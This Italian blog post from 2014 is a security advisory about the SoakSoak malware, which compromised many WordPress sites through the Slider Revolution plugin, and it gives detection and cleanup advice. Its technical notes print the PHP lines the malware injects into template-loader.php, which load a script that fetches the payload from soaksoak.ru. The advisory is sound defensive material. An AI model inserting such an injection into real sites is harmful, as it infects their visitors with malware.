martedì 16 dicembre 2014

Allarme per il malware SoakSoak su WordPress

Domenica scorsa Sucuri ha annunciato l'improvviso diffondersi del malware SoakSoak, che in poche ore in tutto il mondo ha colpito e compromesso CENTINAIA DI MIGLIAIA DI SITI BASATI SU WORDPRESS.

Il malware SoakSoak si è diffuso tramite una vulnerabilità in Slider Revolution, un plugin molto popolare ed utilizzato in migliaia di temi di WordPress.

Consigliamo a tutti gli utenti che utilizzino WordPress:
  • di verificare se il proprio sito è infetto
  • di verificare se sia utilizzato o installato il plugin Slider Revolution
E, nel caso, di adottare tutte le necessarie contromisure.

Come verificare se il sito è infetto


Utilizzate l'apposito servizio gratuito di Sucuri; se il sito è infetto, comparirà la seguente schermata:


Cosa fare se il sito è infetto

La bonifica sembra essere abbastanza complessa, in quanto non è sufficiente la cancellazione dei file infetti, ed al momento non è neanche certo che sia possibile se non attraverso la reinstallazione ex-novo del sito.
Si vedano in fondo le "note tecniche" sulle modalità di infezione.
In caso di infezione, possiamo consigliare di:
  • rivolgersi al servizio di bonifica di Sucuri
    Ricordiamo che si tratta di un servizio esterno: ogni chiarimento in tal senso andrà rivolto direttamente al team di Sucuri
  • reinstallare il sito ex-novo, utilizzando WordPress, temi e plugin nella versione più aggiornata

Cosa fare se il sito non è infetto


Anche se il sito non risulta infetto, consigliamo di verificare urgentemente che WordPress, i temi ed i plugin siano tutti aggiornati all'ultima versione.
(Questo consiglio è SEMPRE VALIDO).

Note tecniche

Il malware SoakSoak interviene modificando il file wp-includes/template-loader.php inserendovi le seguenti righe:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Ciò provoca che in ogni pagina vista sul sito venga compreso wp-includes/js/swobject.js , che a sua volta provoca il download del malware vero e proprio dal sito soaksoak.ru


Riferimenti